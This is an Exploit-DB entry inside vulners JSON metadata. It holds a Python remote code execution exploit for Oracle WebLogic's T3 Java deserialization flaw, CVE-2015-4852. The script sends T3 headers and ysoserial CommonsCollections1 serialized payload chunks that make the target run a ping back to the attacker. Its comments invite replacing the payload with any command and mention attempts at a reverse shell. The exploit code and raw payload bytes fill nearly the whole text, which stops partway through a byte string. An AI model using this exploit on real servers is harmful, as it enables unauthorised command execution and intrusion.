{"lastseen": "2017-09-29T13:53:41", "osvdbidlist": [], "references": [], "description": "Oracle WebLogic Server 10.3.6.0 - Java Deserialization. CVE-2015-4852. Remote exploit for Java platform", "reporter": "Exploit-DB", "published": "2017-09-27T00:00:00", "type": "exploitdb", "title": "Oracle WebLogic Server 10.3.6.0 - Java Deserialization", "enchantments": {"score": {"value": 6.3, "vector": "NONE", "modified": "2017-09-29T13:53:41", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-4852"]}, {"type": "f5", "idList": ["F5:K30518307", "SOL30518307"]}, {"type": "zdt", "idList": ["1337DAY-ID-30269", "1337DAY-ID-28661"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310108067", "OPENVAS:1361412562310806622", "OPENVAS:1361412562310105829"]}, {"type": "exploitdb", "idList": ["EDB-ID:44552", "EDB-ID:46628"]}, {"type": "nessus", "idList": ["F5_BIGIP_SOL30518307.NASL", "WEBLOGIC_2015_4852.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:152268", "PACKETSTORM:144405"]}, {"type": "saint", "idList": ["SAINT:EA211AC1CE6B335FAB2D22929BF61475", "SAINT:364F42DDB229F6E8A0EF4BB04CE504D2", "SAINT:B8E045060F9ACF0F8D488745DBF66B54"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:028DB84C4840B8D96405811A4FA47345"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/MISC/WEBLOGIC_DESERIALIZE_RAWOBJECT"]}, {"type": "canvas", "idList": ["WEBLOGIC_T3_DESERIALIZATION"]}, {"type": "myhack58", "idList": ["MYHACK58:62201784367"]}, {"type": "cert", "idList": ["VU:576313"]}, {"type": "kitploit", "idList": ["KITPLOIT:5052987141331551837"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:4F187FDBA230373382F26BA12E00F8E7"]}, {"type": "oracle", "idList": ["ORACLE:CPUOCT2016-2881722", "ORACLE:CPUJAN2018-3236628", "ORACLE:CPUOCT2017-3236626", "ORACLE:CPUAPR2017-3236618", "ORACLE:CPUJAN2016-2367955"]}], "modified": "2017-09-29T13:53:41", "rev": 2}, "vulnersScore": 6.3}, "bulletinFamily": "exploit", "cvelist": ["CVE-2015-4852"], "modified": 
"2017-09-27T00:00:00", "id": "EDB-ID:42806", "href": "https://www.exploit-db.com/exploits/42806/", "viewCount": 1590, "sourceData": "# Exploit Title: [Oracle WebLogic Server Java Deserialization Remote Code Execution]\r

# Date: [27/09/2017]\r

# Exploit Author: [SlidingWindow] , Twitter: @kapil_khot\r

# Vulnerability Author: FoxGloveSecurity\r

# Vendor Homepage: [http://www.oracle.com/technetwork/middleware/weblogic/overview/index.html]\r

# Affected Versions: [Oracle WebLogic Server, versions 10.3.6.0, 12.1.2.0, 12.1.3.0 and 12.2.1.0]\r

# Tested on: [Oracle WebLogic Server version 10.3.6.0 running on a Docker image Ubuntu 14.04.4 LTS, Trusty Tahr]\r

# CVE : [CVE-2015-4852]\r

\r

'''\r

This exploit tests the target Oracle WebLogic Server for the Java Deserialization RCE vulnerability. The ysoserial payload causes the target to send\r

Ping requests to the attacking machine. You can monitor ICMP ECHO requests on your attacking machine using TCPDump to know if the exploit was successful.\r

Feel free to modify the payload(chunk2) with that of your choice. Don't worry about modifying the payload length each time you change the payload as \r

this script will do it for you on the fly.\r

\r

Note: I tried to get a bash one liner reverse shell payload working but that did not work on my target for some reason. Please let me know if you get it working :)\r

'''\r

\r

#!/usr/bin/env python\r

import socket\r

import sys\r

import struct\r

from binascii import unhexlify\r

\r

print \"\\n[+]Hope you've started monitoring ICMP ECHO requests on your attacking machine before running this exploit...\"\r

print \"[+]Here is the command:\\n\\t tcpdump -nni <eth-adapter> -e icmp[icmptype] == 8\\n\"\r

\r

#Both <target_ip> and <target_port> are required (sys.argv[2] is read below), so bail out unless two arguments were given\r

if len(sys.argv) < 3:\r

\tprint \"\\n[+]Please provide target IP and Port...\"\r

\tprint \"[+]Usage:\\n\\t ./weblogic_linuxPing.py <target_ip> <target_port>\"\r

\tsys.exit()\r

\r

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r

server_address = (sys.argv[1], int(sys.argv[2]))\r

print '[+]Connecting to %s port %s' % server_address\r

sock.connect(server_address)\r

\r

#Send headers\r

headers='t3 12.2.1\\nAS:255\\nHL:19\\nMS:10000000\\nPU:t3://us-l-breens:7001\\n\\n'\r

print '[+]Sending\\n\"%s\"' % headers\r

sock.sendall(headers)\r

\r

data = sock.recv(1024)\r

print >>sys.stderr, '\\n[+]Received \"%s\"' % data\r

\r

\r

#00000b4d (2893 bytes in decimal) is the TOTAL length of the payload(all chunks) that includes ysoserial payload.\r

#We will calculate the TOTAL length of payload (first four bytes in 'chunk1') later as using different ysoserial payload changes the length\r

chunk1='\\x00\\x00\\x0b\\x4d\\x01\\x65\\x01\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x00\\x00\\x00\\x71\\x00\\x00\\xea\\x60\\x00\\x00\\x00\\x18\\x43\\x2e\\xc6\\xa2\\xa6\\x39\\x85\\xb5\\xaf\\x7d\\x63\\xe6\\x43\\x83\\xf4\\x2a\\x6d\\x92\\xc9\\xe9\\xaf\\x0f\\x94\\x72\\x02\\x79\\x73\\x72\\x00\\x78\\x72\\x01\\x78\\x72\\x02\\x78\\x70\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x70\\x70\\x70\\x70\\x70\\x70\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x70\\x06\\xfe\\x01\\x00\\x00\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x1d\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x72\\x6a\\x76\\x6d\\x2e\\x43\\x6c\\x61\\x73\\x73\\x54\\x61\\x62\\x6c\\x65\\x45\\x6e\\x74\\x72\\x79\\x2f\\x52\\x65\\x81\\x57\\xf4\\xf9\\xed\\x0c\\x00\\x00\\x78\\x70\\x72\\x00\\x24\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x2e\\x69\\x6e\\x74\\x65\\x72\\x6e\\x61\\x6c\\x2e\\x50\\x61\\x63\\x6b\\x61\\x67\\x65\\x49\\x6e\\x66\\x6f\\xe6\\xf7\\x23\\xe7\\xb8\\xae\\x1e\\xc9\\x02\\x00\\x09\\x49\\x00\\x05\\x6d\\x61\\x6a\\x6f\\x72\\x49\\x00\\x05\\x6d\\x69\\x6e\\x6f\\x72\\x49\\x00\\x0b\\x70\\x61\\x74\\x63\\x68\\x55\\x70\\x64\\x61\\x74\\x65\\x49\\x00\\x0c\\x72\\x6f\\x6c\\x6c\\x69\\x6e\\x67\\x50\\x61\\x74\\x63\\x68\\x49\\x00\\x0b\\x73\\x65\\x72\\x76\\x69\\x63\\x65\\x50\\x61\\x63\\x6b\\x5a\\x00\\x0e\\x74\\x65\\x6d\\x70\\x6f\\x72\\x61\\x72\\x79\\x50\\x61\\x74\\x63\\x68\\x4c\\x00\\x09\\x69\\x6d\\x70\\x6c\\x54\\x69\\x74\\x6c\\x65\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\x4c\\x00\\x0a\\x69\\x6d\\x70\\x6c\\x56\\x65\\x6e\\x64\\x6f\\x72\\x71\\x00\\x7e\\x00\\x03\\x4c\\x00\\x0b\\x69\\x6d\\x70\\x6c\\x56\\x65\\x72\\x73\\x69\\x6f\\x6e\\x71\\x00\\x7e\\x00\\x03\\x78\\x70\\x77\\x02\\x00\\x00\\x78\\xfe\\x01\\x00\\x00'\r

\r

\r

#java -jar ysoserial-v0.0.4.jar CommonsCollections1 'ping -c 4 10.40.1.39' | xxd > yso.out\r

#len(payload) is xxxx bytes\r

#10.40.1.39 was the attacking IP when the command above was run. Note that the chunk2 bytes embedded below encode 'ping -c 4 192.168.253.130',\r

#so regenerate chunk2 with your own attacking IP; that IP should then receive ICMP Echo Requests from the target.\r

#This is the actual payload that pings back to the attacking machine, this is Chunk#2 in the Payload.\r

\r

#Feel free to change this to a payload of your choice. I could not get a one liner BASH reverse shell working on my target but please let me know if you do :)\r

chunk2 = \"\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x32\\x73\\x75\\x6e\\x2e\\x72\\x65\\x66\\x6c\\x65\\x63\\x74\\x2e\\x61\\x6e\\x6e\\x6f\\x74\\x61\\x74\\x69\\x6f\\x6e\\x2e\\x41\\x6e\\x6e\\x6f\\x74\\x61\\x74\\x69\\x6f\\x6e\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x55\\xca\\xf5\\x0f\\x15\\xcb\\x7e\\xa5\\x02\\x00\\x02\\x4c\\x00\\x0c\\x6d\\x65\\x6d\\x62\\x65\\x72\\x56\\x61\\x6c\\x75\\x65\\x73\\x74\\x00\\x0f\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x75\\x74\\x69\\x6c\\x2f\\x4d\\x61\\x70\\x3b\\x4c\\x00\\x04\\x74\\x79\\x70\\x65\\x74\\x00\\x11\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x43\\x6c\\x61\\x73\\x73\\x3b\\x78\\x70\\x73\\x7d\\x00\\x00\\x00\\x01\\x00\\x0d\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x4d\\x61\\x70\\x78\\x72\\x00\\x17\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x72\\x65\\x66\\x6c\\x65\\x63\\x74\\x2e\\x50\\x72\\x6f\\x78\\x79\\xe1\\x27\\xda\\x20\\xcc\\x10\\x43\\xcb\\x02\\x00\\x01\\x4c\\x00\\x01\\x68\\x74\\x00\\x25\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x72\\x65\\x66\\x6c\\x65\\x63\\x74\\x2f\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x3b\\x78\\x70\\x73\\x71\\x00\\x7e\\x00\\x00\\x73\\x72\\x00\\x2a\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x6d\\x61\\x70\\x2e\\x4c\\x61\\x7a\\x79\\x4d\\x61\\x70\\x6e\\xe5\\x94\\x82\\x9e\\x79\\x10\\x94\\x03\\x00\\x01\\x4c\\x00\\x07\\x66\\x61\\x63\\x74\\x6f\\x72\\x79\\x74\\x00\\x2c\\x4c\\x6f\\x72\\x67\\x2f\\x61\\x70\\x61\\x63\\x68\\x65\\x2f\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2f\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2f\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x3b\\x78\\x70\\x73\\x72\\x00\\x3a\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x66\\x75\\x6e\\x63\\x7
4\\x6f\\x72\\x73\\x2e\\x43\\x68\\x61\\x69\\x6e\\x65\\x64\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x30\\xc7\\x97\\xec\\x28\\x7a\\x97\\x04\\x02\\x00\\x01\\x5b\\x00\\x0d\\x69\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x73\\x74\\x00\\x2d\\x5b\\x4c\\x6f\\x72\\x67\\x2f\\x61\\x70\\x61\\x63\\x68\\x65\\x2f\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2f\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2f\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x3b\\x78\\x70\\x75\\x72\\x00\\x2d\\x5b\\x4c\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x3b\\xbd\\x56\\x2a\\xf1\\xd8\\x34\\x18\\x99\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x05\\x73\\x72\\x00\\x3b\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x66\\x75\\x6e\\x63\\x74\\x6f\\x72\\x73\\x2e\\x43\\x6f\\x6e\\x73\\x74\\x61\\x6e\\x74\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x58\\x76\\x90\\x11\\x41\\x02\\xb1\\x94\\x02\\x00\\x01\\x4c\\x00\\x09\\x69\\x43\\x6f\\x6e\\x73\\x74\\x61\\x6e\\x74\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x78\\x70\\x76\\x72\\x00\\x11\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x52\\x75\\x6e\\x74\\x69\\x6d\\x65\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x78\\x70\\x73\\x72\\x00\\x3a\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x66\\x75\\x6e\\x63\\x74\\x6f\\x72\\x73\\x2e\\x49\\x6e\\x76\\x6f\\x6b\\x65\\x72\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x87\\xe8\\xff\\x6b\\x7b\\x7c\\xce\\x38\\x02\\x00\\x03\\x5b\\x00\\x05\\x69\\x41\\x72\\x67\\x73\\x74\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6
c\\x61\\x6e\\x67\\x2f\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x4c\\x00\\x0b\\x69\\x4d\\x65\\x74\\x68\\x6f\\x64\\x4e\\x61\\x6d\\x65\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\x5b\\x00\\x0b\\x69\\x50\\x61\\x72\\x61\\x6d\\x54\\x79\\x70\\x65\\x73\\x74\\x00\\x12\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x43\\x6c\\x61\\x73\\x73\\x3b\\x78\\x70\\x75\\x72\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x90\\xce\\x58\\x9f\\x10\\x73\\x29\\x6c\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x02\\x74\\x00\\x0a\\x67\\x65\\x74\\x52\\x75\\x6e\\x74\\x69\\x6d\\x65\\x75\\x72\\x00\\x12\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x43\\x6c\\x61\\x73\\x73\\x3b\\xab\\x16\\xd7\\xae\\xcb\\xcd\\x5a\\x99\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x00\\x74\\x00\\x09\\x67\\x65\\x74\\x4d\\x65\\x74\\x68\\x6f\\x64\\x75\\x71\\x00\\x7e\\x00\\x1e\\x00\\x00\\x00\\x02\\x76\\x72\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x53\\x74\\x72\\x69\\x6e\\x67\\xa0\\xf0\\xa4\\x38\\x7a\\x3b\\xb3\\x42\\x02\\x00\\x00\\x78\\x70\\x76\\x71\\x00\\x7e\\x00\\x1e\\x73\\x71\\x00\\x7e\\x00\\x16\\x75\\x71\\x00\\x7e\\x00\\x1b\\x00\\x00\\x00\\x02\\x70\\x75\\x71\\x00\\x7e\\x00\\x1b\\x00\\x00\\x00\\x00\\x74\\x00\\x06\\x69\\x6e\\x76\\x6f\\x6b\\x65\\x75\\x71\\x00\\x7e\\x00\\x1e\\x00\\x00\\x00\\x02\\x76\\x72\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x62\\x6a\\x65\\x63\\x74\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x78\\x70\\x76\\x71\\x00\\x7e\\x00\\x1b\\x73\\x71\\x00\\x7e\\x00\\x16\\x75\\x72\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\xad\\xd2\\x56\\xe7\\xe9\\x1d\\x7b\\x47\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x01\\x74\\x00\\x19\\x70\\x69\\x6e\\x67\\x20\\x2d\\x63\\x20\\x34\\x20\\x31\\x39\\x32\\x2e\\x31\\x36\\x38\\x2e\\x32\\x35\\x33\\x2e\\x31\\x33\\x30\\x74\\x00\\x04\\x65\\x7
8\\x65\\x63\\x75\\x71\\x00\\x7e\\x00\\x1e\\x00\\x00\\x00\\x01\\x71\\x00\\x7e\\x00\\x23\\x73\\x71\\x00\\x7e\\x00\\x11\\x73\\x72\\x00\\x11\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x49\\x6e\\x74\\x65\\x67\\x65\\x72\\x12\\xe2\\xa0\\xa4\\xf7\\x81\\x87\\x38\\x02\\x00\\x01\\x49\\x00\\x05\\x76\\x61\\x6c\\x75\\x65\\x78\\x72\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4e\\x75\\x6d\\x62\\x65\\x72\\x86\\xac\\x95\\x1d\\x0b\\x94\\xe0\\x8b\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x01\\x73\\x72\\x00\\x11\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x48\\x61\\x73\\x68\\x4d\\x61\\x70\\x05\\x07\\xda\\xc1\\xc3\\x16\\x60\\xd1\\x03\\x00\\x02\\x46\\x00\\x0a\\x6c\\x6f\\x61\\x64\\x46\\x61\\x63\\x74\\x6f\\x72\\x49\\x00\\x09\\x74\\x68\\x72\\x65\\x73\\x68\\x6f\\x6c\\x64\\x78\\x70\\x3f\\x40\\x00\\x00\\x00\\x00\\x00\\x00\\x77\\x08\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x00\\x78\\x78\\x76\\x72\\x00\\x12\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x76\\x65\\x72\\x72\\x69\\x64\\x65\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x78\\x70\\x71\\x00\\x7e\\x00\\x3a\"\r

\r

\r

chunk3\t= '\\xfe\\x01\\x00\\x00\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x1d\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x72\\x6a\\x76\\x6d\\x2e\\x43\\x6c\\x61\\x73\\x73\\x54\\x61\\x62\\x6c\\x65\\x45\\x6e\\x74\\x72\\x79\\x2f\\x52\\x65\\x81\\x57\\xf4\\xf9\\xed\\x0c\\x00\\x00\\x78\\x70\\x72\\x00\\x21\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x2e\\x69\\x6e\\x74\\x65\\x72\\x6e\\x61\\x6c\\x2e\\x50\\x65\\x65\\x72\\x49\\x6e\\x66\\x6f\\x58\\x54\\x74\\xf3\\x9b\\xc9\\x08\\xf1\\x02\\x00\\x07\\x49\\x00\\x05\\x6d\\x61\\x6a\\x6f\\x72\\x49\\x00\\x05\\x6d\\x69\\x6e\\x6f\\x72\\x49\\x00\\x0b\\x70\\x61\\x74\\x63\\x68\\x55\\x70\\x64\\x61\\x74\\x65\\x49\\x00\\x0c\\x72\\x6f\\x6c\\x6c\\x69\\x6e\\x67\\x50\\x61\\x74\\x63\\x68\\x49\\x00\\x0b\\x73\\x65\\x72\\x76\\x69\\x63\\x65\\x50\\x61\\x63\\x6b\\x5a\\x00\\x0e\\x74\\x65\\x6d\\x70\\x6f\\x72\\x61\\x72\\x79\\x50\\x61\\x74\\x63\\x68\\x5b\\x00\\x08\\x70\\x61\\x63\\x6b\\x61\\x67\\x65\\x73\\x74\\x00\\x27\\x5b\\x4c\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2f\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x2f\\x69\\x6e\\x74\\x65\\x72\\x6e\\x61\\x6c\\x2f\\x50\\x61\\x63\\x6b\\x61\\x67\\x65\\x49\\x6e\\x66\\x6f\\x3b\\x78\\x72\\x00\\x24\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x2e\\x69\\x6e\\x74\\x65\\x72\\x6e\\x61\\x6c\\x2e\\x56\\x65\\x72\\x73\\x69\\x6f\\x6e\\x49\\x6e\\x66\\x6f\\x97\\x22\\x45\\x51\\x64\\x52\\x46\\x3e\\x02\\x00\\x03\\x5b\\x00\\x08\\x70\\x61\\x63\\x6b\\x61\\x67\\x65\\x73\\x71\\x00\\x7e\\x00\\x03\\x4c\\x00\\x0e\\x72\\x65\\x6c\\x65\\x61\\x73\\x65\\x56\\x65\\x72\\x73\\x69\\x6f\\x6e\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\x5b\\x00\\x12\\x76\\x65\\x72\\x73\\x69\\x6f\\x6e\\x49\\x6e\\x66\\x6f\\x41\\x73\\x42\\x79\\x74\\x65\\x73\\x74\\x00\\x02\\x5b\\x42\\x78\\x72\\x00\\x24\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x2e\\x69\\x6e\\x74\\x65\\x72\\x6e\\x61\\x6c\\x2e\\x50\\x61\\x63\\x6b\\x61\\x67\\x65\\x4
9\\x6e\\x66\\x6f\\xe6\\xf7\\x23\\xe7\\xb8\\xae\\x1e\\xc9\\x02\\x00\\x09\\x49\\x00\\x05\\x6d\\x61\\x6a\\x6f\\x72\\x49\\x00\\x05\\x6d\\x69\\x6e\\x6f\\x72\\x49\\x00\\x0b\\x70\\x61\\x74\\x63\\x68\\x55\\x70\\x64\\x61\\x74\\x65\\x49\\x00\\x0c\\x72\\x6f\\x6c\\x6c\\x69\\x6e\\x67\\x50\\x61\\x74\\x63\\x68\\x49\\x00\\x0b\\x73\\x65\\x72\\x76\\x69\\x63\\x65\\x50\\x61\\x63\\x6b\\x5a\\x00\\x0e\\x74\\x65\\x6d\\x70\\x6f\\x72\\x61\\x72\\x79\\x50\\x61\\x74\\x63\\x68\\x4c\\x00\\x09\\x69\\x6d\\x70\\x6c\\x54\\x69\\x74\\x6c\\x65\\x71\\x00\\x7e\\x00\\x05\\x4c\\x00\\x0a\\x69\\x6d\\x70\\x6c\\x56\\x65\\x6e\\x64\\x6f\\x72\\x71\\x00\\x7e\\x00\\x05\\x4c\\x00\\x0b\\x69\\x6d\\x70\\x6c\\x56\\x65\\x72\\x73\\x69\\x6f\\x6e\\x71\\x00\\x7e\\x00\\x05\\x78\\x70\\x77\\x02\\x00\\x00\\x78\\xfe\\x00\\xff\\xfe\\x01\\x00\\x00\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x13\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x72\\x6a\\x76\\x6d\\x2e\\x4a\\x56\\x4d\\x49\\x44\\xdc\\x49\\xc2\\x3e\\xde\\x12\\x1e\\x2a\\x0c\\x00\\x00\\x78\\x70\\x77\\x46\\x21\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x09\\x31\\x32\\x37\\x2e\\x30\\x2e\\x31\\x2e\\x31\\x00\\x0b\\x75\\x73\\x2d\\x6c\\x2d\\x62\\x72\\x65\\x65\\x6e\\x73\\xa5\\x3c\\xaf\\xf1\\x00\\x00\\x00\\x07\\x00\\x00\\x1b\\x59\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x00\\x78\\xfe\\x01\\x00\\x00\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x13\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x72\\x6a\\x76\\x6d\\x2e\\x4a\\x56\\x4d\\x49\\x44\\xdc\\x49\\xc2\\x3e\\xde\\x12\\x1e\\x2a\\x0c\\x00\\x00\\x78\\x70\\x77\\x1d\\x01\\x81\\x40\\x12\\x81\\x34\\xbf\\x42\\x76\\x00\\x09\\x31\\x32\\x37\\x2e\\x30\\x2e\\x31\\x2e\\x31\\xa5\\x3c\\xaf\\xf1\\x00\\x00\\x00\\x00\\x00\\x78'\r

\r

totallength = len(chunk1) + len(chunk2) + len(chunk3)\r

print \"[+]TOTAL payload length: \", totallength\r

\r

#Update the TOTAL payload length in Chunk1\r

len_hex = hex(totallength)\r

print \"[+]Payload length in HEX: \", len_hex\r

len_hex = len_hex.replace('0x', '0')\r

print \"[+]Payload length in HEX: \" , len_hex\r

\r

s1 = len_hex[:2]\r

s2 = len_hex[2:4]\r

len_hex = unhexlify(s1 + s2)\r

\r

print \"[+]Payload length in HEX now: \", len_hex\r

\r

#Update TOTAL payload length in 'chunk1' (first four bytes) on the fly if user decides to use his own ysoserial payload(Chunk2)\r

print \"[+]Updating Chunk1 according to the TOTAL payload length...\"\r

\r

chunk1 = '\\x00\\x00' + len_hex + '\\x01\\x65\\x01\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x00\\x00\\x00\\x71\\x00\\x00\\xea\\x60\\x00\\x00\\x00\\x18\\x43\\x2e\\xc6\\xa2\\xa6\\x39\\x85\\xb5\\xaf\\x7d\\x63\\xe6\\x43\\x83\\xf4\\x2a\\x6d\\x92\\xc9\\xe9\\xaf\\x0f\\x94\\x72\\x02\\x79\\x73\\x72\\x00\\x78\\x72\\x01\\x78\\x72\\x02\\x78\\x70\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x70\\x70\\x70\\x70\\x70\\x70\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x70\\x06\\xfe\\x01\\x00\\x00\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x1d\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x72\\x6a\\x76\\x6d\\x2e\\x43\\x6c\\x61\\x73\\x73\\x54\\x61\\x62\\x6c\\x65\\x45\\x6e\\x74\\x72\\x79\\x2f\\x52\\x65\\x81\\x57\\xf4\\xf9\\xed\\x0c\\x00\\x00\\x78\\x70\\x72\\x00\\x24\\x77\\x65\\x62\\x6c\\x6f\\x67\\x69\\x63\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x2e\\x69\\x6e\\x74\\x65\\x72\\x6e\\x61\\x6c\\x2e\\x50\\x61\\x63\\x6b\\x61\\x67\\x65\\x49\\x6e\\x66\\x6f\\xe6\\xf7\\x23\\xe7\\xb8\\xae\\x1e\\xc9\\x02\\x00\\x09\\x49\\x00\\x05\\x6d\\x61\\x6a\\x6f\\x72\\x49\\x00\\x05\\x6d\\x69\